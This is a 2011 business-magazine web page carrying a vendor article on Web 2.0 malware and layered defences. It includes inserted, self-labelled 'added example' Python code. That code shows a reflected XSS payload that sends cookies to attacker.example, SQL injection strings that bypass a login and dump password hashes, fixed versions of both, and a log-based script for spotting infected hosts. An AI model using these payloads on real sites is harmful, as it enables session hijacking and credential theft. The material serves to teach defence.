"The online business magazine at the heart of international business management news..."
New Account

The Magazine

Issue 13

E-magazine
  • Previous Issues

Blog

Spencer Green
Chairman, GDS International

Sales and the 'Talent Magnet'

A lot is written about being a ‘Talent Magnet’, either as a company, or as President. It’s all good practice – listen, mentor, reward, provide clear goals and career maps. Good practice for the employer, but what about the employee?
25 May 2011

Defending Against the New Breed of Malware

MX Logic | www.mxlogic.com


Sam Masiello, Director of MX Logic’s Threat Operation Center, was recently asked a rather unusual theoretical question. What would happen today if a company completely turned off all of its Internet and email security?

Sam pondered the question for a few short minutes, then said, “Total annihilation.” He explained how the infection and destruction would take place. First, he explained, the network would be instantly flooded by armies of botnets. Network systems, databases and mail servers would slow to a crawl, and in some cases stop functioning altogether as intruder malware consumed all the computing power. Employee desktops and laptops would be hit next, causing many of them to become virtually useless as viruses and botnets also consumed their processing power. Soon the entire computing infrastructure would be rendered inoperable by anyone inside or outside the company. Sam finished, “I’m guessing it would all take about two or maybe three minutes, tops.”

The Internet Evolves and Explodes

After the infamous bubble burst of the late 1990s and early 2000s, the Internet entered a renaissance period of sorts. During this exciting time, the Internet went from serving up static web pages with read-only content to dishing up rich, dynamic content that users could actually interact with, change, edit and even create themselves.

The idea around community-published content meant that creating and publishing information was no longer limited to a select group. Instead, virtually anyone with an Internet connection and something to share could share it – and share it with the entire planet. Soon, blogs were springing up left and right. If you didn’t have your own blog, you probably knew someone who did.

Once people had the ability to share their ideas with the world, informal communities began organizing around these blogs. Some communities consisted of just a few people sharing ideas and information, while others grew into large, sophisticated communities made up of thousands of members. Sites like Classmates.com and LinkedIn emerged early, but soon gave way to broader, mainstream social networking sites like MySpace and Facebook. Wikipedia took community publishing to a new level by allowing multiple people to create, publish and edit content as a collective group.

The shift from static web pages to dynamic, community-based content forever changed how people viewed and used the Internet. However, with these exciting new technologies and changes came new security concerns and a whole new generation of sophisticated and dangerous online risks for users and companies.

Threat 2.0

Because content on Web 2.0 sites is user-provided, it can contain almost anything. In an un-moderated blog, a post can link to malware downloads (directly or through infected pages) or to offensive material. Video and image files uploaded to sharing sites such as YouTube or Flickr can also carry malicious payloads that target bugs in the player or viewer used to open them. As the Web has become more and more interactive, allowing anyone to post content, the risks have increased as well.

The maturation of "Web 2.0" applications and services, with more software functionality pushed onto client systems and browsers, introduced a new and more complex breed of security vulnerabilities. At the same time, many part-time hackers turned into professional hackers, driven by the growing black market demand for personal and company confidential information.

As a result, today’s Internet is plagued with many different types and forms of what security experts call “malware”. Malware comes in a variety of types, including viruses, worms, Trojans, spyware, adware, rootkits – the list goes on. Each type is classified by what it does and how it propagates itself around the Internet.

Many of these threats have been around for a long time: the term “computer virus” dates from 1983, and the first Internet-scale worm struck in 1988. Threats aimed directly at the Web are more recent. Cross-Site Scripting (XSS) and SQL injection are two of the most prevalent; the first inserts script into pages that a site serves to its users, the second inserts SQL into the queries a site sends to its database. RSS or Atom news feeds, often fed by blogs and other Web 2.0 content, can carry the same injected script or links to malware. Shared or posted pictures and videos can contain Trojans or viruses in a threat known as Backdoor Media Files.

Let’s examine some of the new threats.

Blended Threats

As the name implies, blended threats combine several methods of attack. For example, a single blended virus can contain a keylogger, used to steal passwords and account information, while simultaneously turning your system into a spam zombie in a botnet. Blended threats mark a significant threat escalation because they give cyber criminals several revenue-generating paths from one infection.

Cross-Site Scripting (XSS)

Cross-site scripting is a method of injecting script into a Web application, typically through a form field or a URL key-value pair, so that the application echoes it back inside a page served to other users. Because the injected JavaScript runs in the victim’s browser with the privileges of the vulnerable site, it can read session cookies and login data or perform actions on the user’s behalf. Once an attacker holds a hijacked session or account, malware can be inserted for download by unsuspecting users and a legitimate site becomes a source of infection.
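To make the mechanism concrete, here is an added example (not code from the article or from MX Logic) of a reflected XSS bug in a hypothetical search page, alongside the hardened version. The site names shop.example and attacker.example, the page templates and the two payloads are all assumptions; the point it shows beyond the text is that the fix is escaping for the exact HTML context the input lands in, and that an attribute context can be broken out of without a single `<` character.

```python
import html
from urllib.parse import parse_qs, quote, urlsplit

# Hypothetical search page of a site we call shop.example (assumed name).
# The vulnerable version pastes the user-supplied query straight into the
# HTML it returns; the hardened version escapes it for the context (HTML
# text or a quoted attribute) in which it lands.

def query_from_url(url: str) -> str:
    """Extract the 'q' key-value pair from a request URL, as the server would."""
    return parse_qs(urlsplit(url).query).get("q", [""])[0]

def search_page_vulnerable(query: str) -> str:
    return f"<h1>Results for: {query}</h1>"

def search_page_hardened(query: str) -> str:
    # html.escape turns < > & " ' into entities, so the browser renders the
    # payload as text instead of parsing it as markup.
    return f"<h1>Results for: {html.escape(query, quote=True)}</h1>"

def input_box_vulnerable(query: str) -> str:
    return f'<input name="q" value="{query}">'

def input_box_hardened(query: str) -> str:
    # quote=True matters here: a bare " would terminate the attribute value.
    return f'<input name="q" value="{html.escape(query, quote=True)}">'

# Constructed attacker payloads.  The first, delivered by luring a logged-in
# user to PAYLOAD_URL, ships the victim's cookies to attacker.example
# (assumed name).  The second needs no < at all: it closes the value=""
# attribute and adds an event handler that fires as soon as the page loads.
COOKIE_THEFT = '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'
PAYLOAD_URL = "https://shop.example/search?q=" + quote(COOKIE_THEFT, safe="")
ATTRIBUTE_BREAKOUT = '" autofocus onfocus="alert(document.cookie)'

def demo() -> dict:
    q = query_from_url(PAYLOAD_URL)
    return {
        "decoded_query": q,
        "vulnerable": search_page_vulnerable(q),
        "hardened": search_page_hardened(q),
        "attr_vulnerable": input_box_vulnerable(ATTRIBUTE_BREAKOUT),
        "attr_hardened": input_box_hardened(ATTRIBUTE_BREAKOUT),
    }

if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

Output escaping is the primary fix; marking session cookies HttpOnly so that script cannot read `document.cookie` is a worthwhile second layer, but it does not stop an injected script from acting on the user's behalf.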

SQL Injections

SQL injection is related to XSS in that both exploit input the application fails to validate, but instead of inserting script that runs in a browser, the attacker inserts SQL that the application passes to its backend database. If an attacker submits a crafted string to a vulnerable login page, they can bypass the password check altogether or extract the table of valid user names and passwords (or password hashes).
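The following added example (not from the article or MX Logic) shows both outcomes against a hypothetical login handler backed by an in-memory SQLite table: one input that neutralises the password check, and one that uses UNION to pull every username and hash out of the table. Beside it sits the parameterised version that the same inputs cannot touch. The account names, passwords and the SHA-256 stand-in for a real password hash are assumptions made to keep it self-contained.

```python
import hashlib
import sqlite3

def pw_hash(password: str) -> str:
    # Stand-in for a real password hash (use bcrypt/scrypt/argon2 in
    # production); unsalted SHA-256 keeps the example dependency-free.
    return hashlib.sha256(password.encode()).hexdigest()

def build_db() -> sqlite3.Connection:
    """In-memory users table with two constructed accounts."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT PRIMARY KEY, pw_hash TEXT NOT NULL)")
    con.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", pw_hash("correct horse battery")), ("bob", pw_hash("hunter2"))],
    )
    return con

def login_vulnerable(con: sqlite3.Connection, username: str, password: str):
    # The classic mistake: user input is spliced into the SQL text, so a
    # quote character in the username rewrites the query itself.
    sql = (
        f"SELECT username FROM users WHERE username = '{username}' "
        f"AND pw_hash = '{pw_hash(password)}'"
    )
    row = con.execute(sql).fetchone()
    return row[0] if row else None

def login_hardened(con: sqlite3.Connection, username: str, password: str):
    # Parameterised query: the driver passes the values separately from the
    # statement, so they are only ever compared as data, never parsed as SQL.
    row = con.execute(
        "SELECT username FROM users WHERE username = ? AND pw_hash = ?",
        (username, pw_hash(password)),
    ).fetchone()
    return row[0] if row else None

# Constructed attacker inputs typed into the username field.  The first
# makes the WHERE clause always true and comments out the password check;
# the second appends a UNION that returns username:hash pairs instead.
BYPASS = "' OR 1=1 --"
DUMP = "' UNION SELECT username || ':' || pw_hash FROM users --"

def demo() -> dict:
    con = build_db()
    return {
        "vuln_bypass": login_vulnerable(con, BYPASS, "wrong"),
        "vuln_dump": login_vulnerable(con, DUMP, "wrong"),
        "safe_bypass": login_hardened(con, BYPASS, "wrong"),
        "safe_dump": login_hardened(con, DUMP, "wrong"),
        "safe_real": login_hardened(con, "bob", "hunter2"),
    }

if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

A real login page would return a single record per request, but an attacker can iterate the UNION with `LIMIT 1 OFFSET n` to walk the whole table; parameterisation closes that door because the quote in the input never reaches the SQL parser.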

How Malware Spreads

Almost every interaction a computer has with the outside world can be an entry point for malware. Media like CDs, external drives or peripherals can be infected; during the 2007 Christmas season, digital photo frames were found to have shipped from the factory with a virus on them. Email has long been a mechanism for delivering infected files, and more recent email attacks use links to infected sites instead of attachments, which lets them slip past attachment scanning. The Internet itself is an even bigger threat: the ability to visit sites of all types without knowing who provided the content means that a legitimate-looking site can have unwanted consequences.

Web 2.0 expands that set of threats. As more and more sites allow community interaction, the ability for malicious-minded individuals to insert malware or links into blogs, wikis, social networking sites, and other forums means that all of these applications are potential sources of infection. If users subscribe to these sites via RSS, Atom or other news feeds, the propagation of these infections can be very fast indeed.

While publishers or hosts of Web 2.0 sites should provide a best effort at protecting the user community, it is imperative that users protect themselves as well.

Detecting and Combatting Malware

Most malware infections are still detected by the users themselves, who notice some type of unexpected computer behaviour. Symptoms of an infected machine include slow performance, heavy disk activity on an idle machine, and frequent unexpected pop-up dialog boxes. Another telltale sign is the inability to run or update anti-virus software. At the network level, excessive bandwidth usage, connections on unusual ports, and activity outside business hours can also indicate infected PCs.
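The network-level indicators just listed can be checked mechanically. The following added example (not from the article or MX Logic) applies three of them to a constructed, simplified connection log of the form `timestamp src dst dport bytes`: activity outside business hours, traffic to ports a workstation has no business using (port 6667, IRC, was a common botnet control channel; a workstation sending directly on port 25 is the classic spam-bot pattern, since only the mail server should do that), and total outbound volume above a threshold. The log lines, the hosts, the business-hours window and the byte threshold are all assumptions.

```python
from collections import defaultdict
from datetime import datetime

# Constructed sample log (not real traffic): timestamp src dst dport bytes.
# 10.0.0.41 is the host that is meant to look infected.
SAMPLE_LOG = """\
2011-05-25T09:12:03 10.0.0.12 93.184.216.34 443 18230
2011-05-25T09:13:10 10.0.0.12 93.184.216.34 80 9120
2011-05-25T03:02:44 10.0.0.41 198.51.100.7 6667 880
2011-05-25T03:02:45 10.0.0.41 198.51.100.7 6667 910
2011-05-25T03:05:12 10.0.0.41 203.0.113.9 25 52000
2011-05-25T03:05:13 10.0.0.41 203.0.113.10 25 51800
2011-05-25T03:05:14 10.0.0.41 203.0.113.11 25 52100
2011-05-25T14:40:01 10.0.0.77 93.184.216.34 443 2200
"""

BUSINESS_HOURS = range(8, 19)          # assumed 08:00-18:59 local time
EXPECTED_PORTS = {80, 443, 53}         # assumed normal workstation egress

def parse_line(line: str) -> dict:
    ts, src, dst, dport, nbytes = line.split()
    return {"ts": datetime.fromisoformat(ts), "src": src, "dst": dst,
            "dport": int(dport), "bytes": int(nbytes)}

def flag_hosts(log_text: str, mail_servers=frozenset(), byte_limit: int = 100_000) -> dict:
    """Return {src_host: sorted list of reasons} for every host that tripped a rule."""
    reasons = defaultdict(set)
    total_bytes = defaultdict(int)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        r = parse_line(line)
        total_bytes[r["src"]] += r["bytes"]
        if r["ts"].hour not in BUSINESS_HOURS:
            reasons[r["src"]].add("off-hours activity")
        if r["dport"] == 25:
            # Direct-to-MX mail from anything but the mail server is the
            # signature of a spam zombie.
            if r["src"] not in mail_servers:
                reasons[r["src"]].add("direct outbound SMTP (spam bot pattern)")
        elif r["dport"] not in EXPECTED_PORTS:
            reasons[r["src"]].add(f"unexpected port {r['dport']}")
    for host, nbytes in total_bytes.items():
        if nbytes > byte_limit:
            reasons[host].add("excessive bandwidth")
    return {host: sorted(rs) for host, rs in reasons.items()}

if __name__ == "__main__":
    for host, why in flag_hosts(SAMPLE_LOG).items():
        print(host, "->", "; ".join(why))
```

Each rule on its own produces false positives (a night-shift worker, a legitimate but unusual application), which is why the function collects reasons per host rather than raising a verdict on the first hit; a host that trips several rules at once, as 10.0.0.41 does, is the one worth pulling off the network first.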

Malware has become more sophisticated, but security technology has also advanced greatly in recent years. Using the right security technologies and following industry best practices can greatly reduce malware as an issue. Following are some expert tips about what you can do to protect yourself and your company.

  • Implement security in layers. Using anti-spam, anti-virus and anti-spyware solutions in the network, at your gateway, and beyond the perimeter (in the cloud), in addition to on individual desktop computers, provides much greater overall protection because no single product catches everything.
  • Implement a firewall. A network firewall can prevent many infections by blocking them before they enter the network. Just as important, it can block unwanted outbound traffic, such as spam sent directly to the Internet by a machine that has already joined a botnet.
  • Use strong passwords. Experts agree that using a different password for each application is one of the best preventative measures you can take; never reuse one across sites. Institute a password policy: a strong password should be at least 8 characters long and contain a mix of upper- and lowercase letters, numbers, and one or more special characters such as exclamation points. (Length counts for more than any single character rule, and current guidance such as NIST SP 800-63B no longer recommends forcing frequent changes; change a password promptly when you suspect it has been exposed.)
  • Keep software up to date. Install patches so attackers can’t exploit known vulnerabilities, and enable automatic updates for the operating system, browsers and anti-malware applications. A virus engine is only as good as its signature set.
  • Never download blindly from people or sites that you do not know or cannot trust. Make sure the website you are visiting is the real one by typing URLs directly into the browser instead of clicking links in emails, and make sure that every downloaded file is scanned by antivirus software, either at the gateway before download or on the desktop.
  • Don’t get lulled into a false sense of security just because you have anti-virus software. Signature-based anti-virus often cannot detect new or modified viruses and Trojans, and desktop anti-virus cannot inspect malware until it has already arrived on the PC.
  • Be cautious. If a file comes from a “friend”, make sure you know what it contains before opening it. As discussed, an infected machine will attempt to propagate itself to its owner’s contacts.
  • Follow good security practices. Take appropriate precautions when using email and web browsers to reduce the risk that your actions will trigger an infection.

Fighting Bad Technology with Good Layered Technology

There are many ways to protect personal or corporate information and infrastructure from Internet threats. Desktop and server software, network appliances and managed services all provide different levels of protection. As mentioned above, a layered approach is ultimately best. Since computer-related security threats are growing in sophistication and always changing, having multiple checks increases the probability that one layer will detect a threat before it reaches its intended destination.

One of the simplest and most cost-effective ways of adding multiple layers of protection is to insert a managed security service into your security mix. Unlike hardware or software installed on your own premises, a managed security service sits outside the corporate infrastructure, providing a buffer between the Internet and the network. Managed services, like those provided by MX Logic, are also monitored 24x7x365 and are updated frequently to handle the latest Internet threats.

Although the services are often bundled together, there are two standard types of managed services that most companies consider – email defense and web defense. An email defense service filters messages before they ever reach the corporate infrastructure. Since up to 80 percent of all email messages are spam or contain some form of malware, stopping these messages before they reach the network not only prevents malware infiltration, but also frees up valuable bandwidth.

Like email defense, a web defense service prevents malware from being transferred from malicious websites to the corporate infrastructure by providing a buffer that sits outside the network. A service like the MX Logic Web Defense service provides both malware protection and content control services. With the service, users are prevented from knowingly or unknowingly accessing phishing or spyware websites. All files accessed through the Internet are also filtered before ever reaching the network. Finally, machines that are already infected are prevented from sending out information, and reports are generated letting administrators know which computers are infected by botnets or malware.

Using a managed security service is an excellent and affordable way to provide additional layers of protection and is ideal for both small and large organizations.

Surf on Safely

Email, the Internet and other online tools are an integral part of modern business. Many of the Web 2.0 innovations have made the Internet a much richer and more useful tool for everyone. Still, the Internet poses great risks and complex security threats that need to be acknowledged and addressed. Recognizing the threats and cleaning up after them are steps in solving the problem, but proactive approaches such as implementing security in layers are much more effective. More layers of security provide a better ability to find and stop Internet threats before they infect a machine, expose sensitive information or consume valuable resources. As the saying goes, an ounce of prevention is worth a pound of cure.

